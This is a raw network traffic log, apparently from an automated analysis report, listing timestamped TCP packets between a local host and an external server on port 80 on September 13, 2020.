Sep 13, 2020 20:55:12.936137915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936148882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936161041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936170101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936182022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936192036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936203003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936213017 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936225891 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936237097 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936248064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936259031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936268091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936279058 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936290026 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936300039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936311007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936321020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936331987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936352015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936361074 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936371088 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936379910 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.936389923 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936399937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936409950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.936701059 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.960309029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960329056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960345030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960362911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960391045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960453987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960463047 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.960500956 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960553885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960589886 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.960613012 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960694075 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960716009 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960720062 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.960777044 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960817099 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.960850000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960901976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.960906982 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.960942984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961036921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961039066 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.961107016 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961134911 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.961165905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961231947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961257935 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.961287975 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961335897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961402893 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961441994 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.961453915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961481094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961508989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961536884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961569071 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961570024 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.961599112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961626053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961637974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961647034 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961657047 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961668015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961682081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961692095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961703062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961719036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961726904 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961743116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961772919 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961802959 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.961815119 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961833954 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961854935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961884022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961909056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961941957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961961985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.961963892 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.961986065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962013960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962044001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962061882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962073088 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962076902 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.962090015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962107897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962136984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962204933 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.962215900 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962234974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962251902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962300062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962336063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962354898 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962373972 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962388992 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.962389946 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962409019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962424040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962443113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962460995 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962474108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962483883 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962492943 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962502003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962511063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962518930 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962527037 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962537050 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962547064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962555885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962563992 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.962565899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962577105 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962585926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962595940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962605000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962614059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962621927 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962630987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962641001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962652922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962662935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962675095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962691069 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962708950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962728977 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962748051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962764025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962776899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962791920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962810040 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962811947 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.962827921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962843895 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962862015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962878942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962897062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962914944 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962933064 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962950945 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962970018 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962985039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.962996960 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963012934 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963026047 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.963032007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963047981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963063955 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963083029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963099957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963118076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963135958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963154078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963181019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963197947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963219881 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.963234901 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963252068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963277102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963294029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963295937 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.963311911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963327885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963346958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963363886 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963382006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963399887 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963418007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963434935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963454008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963470936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963479996 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.963489056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.963587999 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.987322092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987391949 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987428904 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987451077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987459898 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.987473011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987483978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987509966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987525940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987541914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987561941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987575054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987597942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987611055 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987626076 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987643957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987663984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987675905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987700939 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987719059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987741947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987766981 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987797022 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987826109 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987855911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987863064 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.987867117 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987876892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987885952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987895966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987905025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987915039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987935066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987960100 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.987988949 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988013029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988038063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988064051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988091946 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988125086 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988162994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988193035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988225937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988245010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988245010 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.988255978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988265991 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988276958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988305092 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988344908 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988357067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988377094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988411903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988435030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988447905 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988466978 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988498926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988528013 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988571882 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988585949 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.988599062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988626957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988652945 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988683939 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988706112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988729000 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988766909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988801003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988821030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988822937 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.988831997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988841057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988851070 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988859892 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988877058 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988888025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988897085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988907099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988915920 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988926888 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988935947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988945007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988955021 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988965034 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988974094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988984108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.988992929 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989001989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989012003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989021063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989032030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989053011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989064932 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989075899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989087105 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989098072 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989108086 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989120007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989130020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989141941 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989152908 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989165068 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989176035 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989186049 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989197016 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989207029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989217043 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.989233017 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.989423037 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.228112936 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.241626024 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.241764069 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.251827002 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251859903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251876116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251885891 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251903057 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251918077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251933098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251955986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251972914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251979113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251986027 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251991987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.251997948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252007008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252105951 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252120018 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252131939 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252144098 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252156973 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252168894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252177954 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:13.252177954 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252187014 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252192974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252201080 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252207041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252213955 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252221107 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252232075 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252242088 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252254963 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252266884 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252278090 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252291918 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252304077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252316952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252329111 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:13.252341986 CEST	80	49723	47.245.136.23	192.168.2.3
